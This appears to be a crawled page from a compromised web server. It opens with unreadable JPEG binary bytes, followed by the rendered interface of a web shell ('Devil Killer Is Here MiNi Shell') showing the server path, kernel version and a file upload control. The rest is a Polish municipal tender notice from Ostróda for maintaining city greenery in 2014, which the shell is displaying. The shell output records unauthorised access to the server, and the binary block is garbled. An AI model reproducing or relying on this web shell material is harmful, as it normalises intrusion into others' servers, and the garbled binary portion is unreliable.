JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131122/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131122/249387-N-2013.html

<p class="kh_header"><b>Ostróda: UTRZYMANIE I PIELĘGNACJA ZIELENI MIEJSKIEJ NA TERENIE MIASTA OSTRÓDA W 2014R.</b><br>
<b>Numer ogłoszenia: 249387 - 2013; data zamieszczenia: 22.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Ostróda , ul. Mickiewicza 24, 14-100 Ostróda, woj. warmińsko-mazurskie, tel. 089 6429400, faks 089 6429401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostroda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTRZYMANIE I PIELĘGNACJA ZIELENI MIEJSKIEJ NA TERENIE MIASTA OSTRÓDA W 2014R..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie i pielęgnacja zieleni miejskiej na terenie miasta Ostróda, w zakresie:
Część 1. Utrzymanie i konserwacja zieleni miejskiej wraz z oczyszczaniem nawierzchni alejek w parkach na terenie miasta Ostróda.
Część 2. Utrzymanie i konserwacja zieleni miejskiej wraz z oczyszczaniem nawierzchni alejek miasta Ostróda.
Część 3. Doraźne utrzymanie i konserwacja zieleni miejskiej na terenie miasta Ostróda.
Część 4. Wycinka oraz cięcia pielęgnacyjne i sanitarne drzew na pozostałych terenach miejskich.
Część 5. Wykonanie nasadzeń w murkach przy ul. Czarnieckiego wraz z ich pielęgnacją oraz pielęgnacją rabaty przy ul. Jana Pawła II i ul. Czarnieckiego- ul. Sienkiewicza w Ostródzie.
Zgodnie z wykazem terenów zieleni miejskiej (załączniki nr 5a, b, e), wykazem prac objętych zamówieniem (załącznik nr 6), załącznikami graficznymi (załącznik nr 7), wykazem nasadzeń (załącznik nr 8a, b, e), opisem wycinki drzew (załącznik nr 9), projektami umów (załączniki nr 3a, b, c, d, e) i § 19 siwz.
Uwaga:
1. Każdy wykonawca może złożyć ofertę tylko na jedną wybraną część.
2. Zamawiający zastrzega sobie możliwość ograniczenia zakresu przedmiotu zamówienia do wysokości środków zabezpieczonych w Budżecie Miasta Ostróda na rok 2014.
3. Zamawiający zastrzega sobie możliwość ograniczenia zakresu rzeczowo-finansowego objętego niniejszą umową do świadczenia usługi na terenach gminnych, w przypadku niezawarcia porozumienia ze Starostwem Powiatowym w Ostródzie na utrzymanie dróg powiatowych na terenie miasta Ostróda na rok 2014r. lub odstąpienia od podpisanego porozumienia przez jedną ze Stron..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W zakresie części 1, 2, 3, 4 przewiduje się możliwość udzielania zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt 6 uPzp</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.21.14.00-6, 77.21.15.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia w zakresie części 1, 2 lub 3 musi posiadać zezwolenie na zbieranie odpadów z terenu miasta Ostróda wydane przez Starostę Powiatu Ostródzkiego oraz zezwolenie na transport odpadów wydane przez starostę właściwego ze względu na miejsce siedziby lub zamieszkania wykonawcy, zgodnie z art. 28 ustawy z dnia 27 kwietnia 2001r. o odpadach (t.j. Dz.U. z 2010r. Nr 185, poz. 1243 z późn. zm.).
Spełnianie warunku posiadania uprawnień do wykonywania określonej czynności zostanie ocenione na zasadzie spełnia / nie spełnia, na podstawie dokumentów (dokumentu), o których mowa w § 6 ust. 1 pkt 1 siwz. Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykazanie posiadania wiedzy i doświadczenia w zakresie wykonania lub wykonywania w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie:
Część 1- co najmniej jednej usługi polegającej na codziennym utrzymaniu i konserwacji zieleni miejskiej lub parkowej o powierzchni minimum 50.000,0m2, wykonywanej w systemie ciągłym przez okres co najmniej 6 miesięcy, obejmującym miesiące wiosenne, letnie i/lub jesienne.
Część 2- co najmniej jednej usługi polegającej na codziennym utrzymaniu i konserwacji zieleni miejskiej lub parkowej o powierzchni minimum 50.000,0m2, wykonywanej w systemie ciągłym przez okres co najmniej 6 miesięcy, obejmującym miesiące wiosenne, letnie i/lub jesienne.
Część 3- co najmniej jednej usługi polegającej na doraźnym utrzymaniu i konserwacji zieleni miejskiej lub parkowej o wartości minimum 10.000,00 PLN brutto.
Część 4- wycinek drzew oraz cięć pielęgnacyjnych i sanitarnych drzew na ogólną kwotę minimum 40.000,00 PLN brutto. Dopuszcza się możliwość wykazania posiadania wiedzy i doświadczenia na podstawie jednej usługi realizowanej na wymaganą kwotę lub też na podstawie kilku usług, których łączna wartość wyniesienie minimum 40.000,00 PLN brutto.
Część 5- co najmniej dwóch usług polegających na nasadzeniu roślin wieloletnich wraz z ich pielęgnacją o wartości minimum 20.000,00 PLN brutto każda. Dopuszcza się możliwość wykazania posiadania wiedzy i doświadczenia odrębnie dla nasadzeń i pielęgnacji, w takim przypadku łączna wartość każdej pary usług musi wynieść minimum 20.000,00 PLN brutto.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Spełnianie warunku zostanie ocenione na zasadzie spełnia / nie spełnia, na podstawie dokumentu, o którym mowa w § 6 ust. 1 pkt 2 siwz. Niewykazanie spełniania warunku spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykazanie, że wykonawca dysponuje potencjałem technicznym niezbędnym do wykonania zamówienia, tj.:
Część 1- mechanicznymi kosiarkami do koszenia trawy- minimum 4 szt.; mechanicznymi kosiarkami do koszenia żywopłotu- minimum 2 szt.; mechanicznymi piłami do cięcia drzew- minimum 2 szt.; minimum 1 ciągnikiem ogrodniczym z przyczepą lub innym środkiem transportu dostosowanym do wywozu drewna pochodzącego z wyciętych drzew lub usuwanych gałęzi i konarów; minimum 1 środkiem transportu dostosowanym do wywozu zebranych nieczystości do miejsca magazynowania lub unieszkodliwiania odpadów.
Część 2- mechanicznymi kosiarkami do koszenia trawy- minimum 2 szt.; mechanicznymi kosiarkami do koszenia żywopłotu- minimum 2 szt.; minimum 1 mechaniczną piłą do cięcia drzew; minimum 1 ciągnikiem ogrodniczym z przyczepą lub innym środkiem transportu dostosowanym do wywozu drewna pochodzącego z wyciętych drzew lub usuwanych gałęzi i konarów; minimum 1 środkiem transportu dostosowanym do wywozu zebranych nieczystości do miejsca magazynowania lub unieszkodliwiania odpadów.
Część 3- mechanicznymi kosiarkami do koszenia trawy- minimum 2 szt.; mechanicznymi kosiarkami do koszenia żywopłotu- minimum 1 szt.; minimum 1 środkiem transportu dostosowanym do wywozu zebranych nieczystości do miejsca magazynowania lub unieszkodliwiania odpadów.
Część 4- mechanicznymi piłami do cięcia drzew- minimum 2 szt.; minimum 1 ciągnikiem ogrodniczym z przyczepą lub innym środkiem transportu dostosowanym do wywozu drewna pochodzącego z wyciętych drzew lub usuwanych gałęzi i konarów. 
Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Spełnianie warunku zostanie ocenione na zasadzie spełnia / nie spełnia, na podstawie dokumentu, o którym mowa w § 6 ust. 1 pkt 3 siwz. Niewykazanie spełniania warunku spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykazanie, że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jn.: 
Część 1:
a) Osobą koordynującą prowadzone prace i zarazem odpowiedzialną za prawidłowe świadczenie usługi. Wskazana osoba musi posiadać przygotowanie do zawodu o profilu ogrodniczym lub rolniczym oraz posiadać co najmniej 3 letnie doświadczenie w koordynowaniu lub nadzorowaniu prac związanych z utrzymaniem i pielęgnacją zieleni miejskiej lub parkowej.
b) Co najmniej dwiema osobami posiadającymi uprawnienia do wykonywania wycinki oraz cięć pielęgnacyjnych i sanitarnych drzew, które będą realizować usługę w zakresie w/w uprawnień.
Część 2:
a) Osobą koordynującą prowadzone prace i zarazem odpowiedzialną za prawidłowe świadczenie usługi w zakresie utrzymania i pielęgnacji zieleni miejskiej. Wskazana osoba musi posiadać przygotowanie do zawodu o profilu ogrodniczym lub rolniczym oraz posiadać co najmniej 3 letnie doświadczenie w koordynowaniu lub nadzorowaniu prac związanych z utrzymaniem i pielęgnacją zieleni miejskiej lub parkowej.
b) Co najmniej jedną osobą posiadającą uprawnienia do wykonywania wycinki oraz cięć pielęgnacyjnych i sanitarnych drzew, która będzie realizować usługę w zakresie w/w uprawnień.
Część 3: Osobą koordynującą prowadzone prace i zarazem odpowiedzialną za prawidłowe świadczenie usługi w zakresie utrzymania i pielęgnacji zieleni miejskiej. Wskazana osoba musi posiadać przygotowanie do zawodu o profilu ogrodniczym lub rolniczym oraz posiadać co najmniej 3 letnie doświadczenie w koordynowaniu lub nadzorowaniu prac związanych z utrzymaniem i pielęgnacją zieleni miejskiej lub parkowej.
Część 4:
a) Osobą koordynującą prowadzone prace i zarazem odpowiedzialną za prawidłowe świadczenie usługi. Wskazana osoba musi posiadać co najmniej 3 letnie doświadczenie w koordynowaniu lub nadzorowaniu prac związanych z wycinką oraz cięciami pielęgnacyjnymi i sanitarnymi drzew.
b) Co najmniej dwiema osobami posiadającymi uprawnienia do wykonywania wycinki oraz cięć pielęgnacyjnych i sanitarnych drzew, które będą realizować usługę w zakresie w/w uprawnień.
Część 5: Osobą koordynującą prowadzone prace i zarazem odpowiedzialną za prawidłowe świadczenie usługi. Wskazana osoba musi posiadać doświadczenie w zakresie koordynowania lub nadzorowania co najmniej dwóch usług polegających na nasadzeniu roślin wieloletnich wraz z ich pielęgnacją.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Spełnianie warunku dysponowania osobami zdolnymi do wykonania zamówienia zostanie ocenione na zasadzie spełnia/nie spełnia, na podstawie dokumentu, o którym mowa w § 6 ust. 1 pkt 4 siwz. Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 uPzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany formularz ofertowy (zał. nr 1 do siwz).
2) Kalkulacja ceny ofertowej (zał. nr 4a, 4b, 4c, 4d, 4e do siwz).
3) W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku wykonawców - wykonawca winien załączyć do oferty pełnomocnictwo podpisane przez wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia, złożone w formie oryginału lub notarialnie potwierdzonej kopii. Wzór pełnomocnictwa stanowi załącznik nr 13 do siwz. 
d) W przypadku ustanowienia przez Wykonawcę pełnomocnika, do oferty należy załączyć oryginał udzielonego pełnomocnictwa lub notarialnie potwierdzoną jego kopię. Z treści pełnomocnictwa musi jednoznacznie wynikać zakres umocowania do czynności związanych  z postępowaniem o udzielenie zamówienia publicznego, w szczególności do podpisania i złożenia oferty.
e) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zastrzega sobie możliwość ograniczenia zakresu rzeczowego określonego umową lub zamiennie wprowadzić tereny inne niż wymienione w wykazie terenów zieleni miejskiej (załącznik nr 5a do siwz), bez skutków finansowych i prawnych dla Zamawiającego, w przypadku:
a) niezawarcia porozumienia ze Starostwem Powiatowym w Ostródzie na utrzymanie dróg powiatowych na terenie miasta Ostróda lub odstąpienia od podpisanego porozumienia przez jedną ze stron porozumienia;
b) niezabezpieczenia w Budżecie Miasta Ostróda na rok 2014 środków finansowych w wysokości wystarczającej na realizację pełnego zakresu przedmiotu zamówienia;
c) zaistnienia trudności finansowych u Zamawiającego.
2. W przypadku ograniczenia zakresu rzeczowego umowy, o którym mowa w pkt 1, wynagrodzenie przysługujące Wykonawcy za realizację przedmiotu umowy zostanie zmniejszone w oparciu o stawki jednostkowe określone w ofercie.
3. W przypadku zaistnienia okoliczności, o których mowa w pkt 1 i 2, wynikające z nich zmiany zostaną wprowadzone do umowy aneksem podpisanym przez Strony.
4. W przypadku zaistnienia konieczności rozszerzenia usługi o tereny nieobjęte niniejszą umową, rozszerzony zakres rzeczowy będzie realizowany na podstawie odrębnej pisemnej umowy, w oparciu o stawki jednostkowe określone w ofercie.
(pkt 1-4 dotyczy części 1, 2 oraz części 5 z wyłączeniem pkt 1 lit. a i pkt 4)
5. Zmiana w trakcie realizacji przedmiotu umowy osoby odpowiedzialnej za świadczenie usługi lub którejkolwiek z osób wskazanych w ofercie przez wykonawcę, musi być uzasadniona przez Wykonawcę na piśmie i wymaga pisemnego zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty przedłożenia propozycji i wyłącznie wtedy, gdy kwalifikacje wskazanej osoby będą takie same lub wyższe od kwalifikacji wymaganych dla danej osoby w przeprowadzonym postępowaniu przetargowym. 
6. Wykonawca musi przedłożyć Zamawiającemu propozycję zmiany, o której mowa w pkt 5 nie później niż 7 dni przed planowanym skierowaniem do świadczenia usługi innej osoby. 
7. Postanowienia pkt 6 nie dotyczą sytuacji losowych, np. niezdolności do pracy pierwotnie wskazanej osoby.
8. Skierowanie, bez akceptacji Zamawiającego, do świadczenia usługi osoby innej niż pierwotnie wskazana w ofercie, może stanowić podstawę do rozwiązania umowy z winy Wykonawcy, z zastrzeżeniem postanowień pkt 7.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/ostroda_gmina_miejska<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ostródzie, 14-100 Ostróda, ul. A. Mickiewicza 24, pokój 302.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2013 godzina 08:00, miejsce: Urząd Miejski w Ostródzie, 14-100 Ostróda, ul. A. Mickiewicza 24, pokój 219.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim.
2. Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i wykonawcy przekazują pisemnie, faksem lub drogą elektroniczną, z zastrzeżeniem wyjątków określonych w uPzp, dla których bezwzględnie wymagana jest forma pisemna.
